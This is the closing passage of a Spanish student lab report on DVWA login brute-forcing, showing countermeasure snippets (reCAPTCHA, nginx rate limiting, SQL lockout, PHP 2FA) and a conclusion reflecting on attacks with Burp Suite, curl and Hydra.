        \end{itemize}
    \end{itemize}
    ejemplo con PHP
    \begin{verbatim}
        // En el formulario de login
<div class="g-recaptcha" data-sitekey="TU_CLAVE_SITIO"></div>

// Validación del lado del servidor
$response = $_POST['g-recaptcha-response'];
$secret = "TU_CLAVE_SECRETA";
$verify = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret={$secret}&response={$response}");
$captcha_success = json_decode($verify)->success;

if (!$captcha_success) {
    die("CAPTCHA fallido");
} 
    \end{verbatim}
    \item \textbf{Rate Limiting (Límite de Intentos)}
    
    \begin{itemize}
        \item \textit{Cómo funciona:}
        \begin{itemize}
            \item Limita el número de intentos de login por usuario/IP en un período de tiempo
        \end{itemize}
    \end{itemize}
    Ejemplo con nginx:
    \begin{verbatim}
        # En /etc/nginx/nginx.conf
limit_req_zone $binary_remote_addr zone=login_limit:10m rate=5r/m;

location /login.php {
    limit_req zone=login_limit burst=10 nodelay;
}
    \end{verbatim}
    \item \textbf{Mecanismo de Bloqueo por Cuenta}
    
    \begin{itemize}
        \item \textit{Cómo funciona:}
        \begin{itemize}
            \item Bloquea cuentas temporalmente tras varios intentos fallidos
        \end{itemize}
    \end{itemize}
    Ejemplo con SQL
    \begin{verbatim}
        -- Tabla para registrar intentos
CREATE TABLE login_attempts (
    user_id INT,
    attempts INT,
    last_attempt TIMESTAMP,
    PRIMARY KEY (user_id)
);

-- Consulta de verificación
UPDATE login_attempts 
SET attempts = attempts + 1, last_attempt = NOW() 
WHERE user_id = ?;

-- Bloqueo si hay >5 intentos en 15 mins
SELECT COUNT(*) FROM login_attempts 
WHERE user_id = ? AND last_attempt > NOW() - INTERVAL 15 MINUTE
HAVING COUNT(*) > 5;
    \end{verbatim}
    \item \textbf{Autenticación Multi-Factor (MFA/2FA)}
    
    \begin{itemize}
        \item \textit{Cómo funciona:}
        \begin{itemize}
            \item Requiere un segundo factor (código SMS, app authenticator, etc.) además de la contraseña
        \end{itemize}
    \end{itemize}
    Ejemplo con codigo PHP
    \begin{verbatim}
        // Generar secreto para el usuario
$secret = (new Google2FA())->generateSecretKey();

// Verificar código
$isValid = (new Google2FA())->verifyKey(
    $user->two_factor_secret, 
    $_POST['2fa_code']
);

if (!$isValid) {
    die("Código 2FA inválido");
}
    \end{verbatim}
    
\end{enumerate}

\section{Conclusiones y comentarios}
por lo que se ha visto, se comprende el aprendizaje de varios metodos de ataque hacia al DVWA en este caso burpsuite, curl e hydra.
lo mas dificil y complejo a la hora de realizar este lab es el burpsuite que se tiene que realizar varios pasos para que se efectue bien el ataque, inclusive con todo eso no se ha encontrado al menos un par de crendenciales para su ataque ya que marcaba solamente acceso 200.
aunque si se pudo detectar que tuvo mas de un par de credenciales exitosos viendose el largo del paquete no fue una respuesta muy "clara" para el informe
el caso de curl e hydra ha sido mucho mas sencillo su uso, siendo realizado con solo unos minutos en este caso aunque para ver los paquetes ha sido algo sencillo ya que en curl e hydra se encontraron paquetes, para el caso de burpsuite no se tuvo exito ver los paquetes usando wireshark.
para la realizacion del programa de python fue sencillo como fue en el caso de curl e hydra y se encontraron varios credenciales utiles en el ataque, en la comparacion de rendimiento se ha intuido que es por python pero en este caso no tengo mucha certeza si se hizo correctamente

Tambien no tuve mucho tiempo ya que mi notebook que tiene Ubuntu Linux esta en "modo patata" ya que es un dispositivo viejo, asi que se tuvo que recurrir a pedir salas de laboratorio para la realizacion de este lab, asi que no se tuvo el tiempo suficiente ni el hardware suficiente para realizar de mejor forma este informe.
Pero en sintesis se ha aprendido bastante sobre los metodos de ataque y como funciona por dentro cada uno ya sea burpsuite, curl e hydra.


\end{document}